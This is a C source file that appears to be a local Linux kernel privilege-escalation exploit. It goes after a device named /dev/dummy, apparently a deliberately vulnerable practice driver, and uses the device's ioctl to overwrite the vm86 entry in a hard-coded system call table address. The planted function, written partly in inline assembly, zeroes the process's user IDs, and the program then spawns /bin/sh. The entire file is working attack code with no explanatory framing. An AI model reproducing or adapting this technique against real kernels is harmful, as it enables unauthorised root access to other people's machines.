#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include "../dummy/dummy.h"
#include <asm/unistd.h>

#define SYS_CALL_TABLE	( 0xc0418480  )
uid_t uid;
void gainpriv(unsigned int *p)
{
    int i;
    for(i=0;i<0x100;i++)
    {
    if((p[i]==uid) && (p[i+1]==uid))
	p[i]=0,p[i+1]=0;
    }
}

void execme(void)
{
    asm volatile ("movl %%esp, %%eax;"
		    "andl %0, %%eax;"
		    "movl (%%eax), %%eax;"
		    "add $100, %%eax;"
		    "pushl %%eax;"
		    "movl $gainpriv, %%ebx;"
		    "call *%%ebx;"
		    "popl %%ebx;" :: "i"(~(8192 -1)));
    return;
}

int main(int argc, char **argv)
{
    int fd;
    dummy_t dummy;
    void **sys_call_table = (void**)SYS_CALL_TABLE;
    
    if((fd = open("/dev/dummy", O_RDWR)) < 0)
    {
	perror("open");
	return 1;
    }
    printf("opened\n");

    uid = getuid();
    memset(&dummy,0,sizeof(dummy));
    
    dummy.source = (long *) execme;
    dummy.dest   = (long *) sys_call_table + (__NR_vm86);
    printf("overwriting %p with %p\n",sys_call_table+(__NR_vm86), execme);
    
    if(ioctl(fd, DUMMY_COMMAND, &dummy) < 0)
    {
	perror("ioctl\n");
	return 2;
    }
    printf("executed ioctl (sys_vm86 overwrite)\n");
    vm86(0,0);
    printf("launching shell\n");
    execl("/bin/sh", "/bin/sh", 0);
    
    return 0;
}
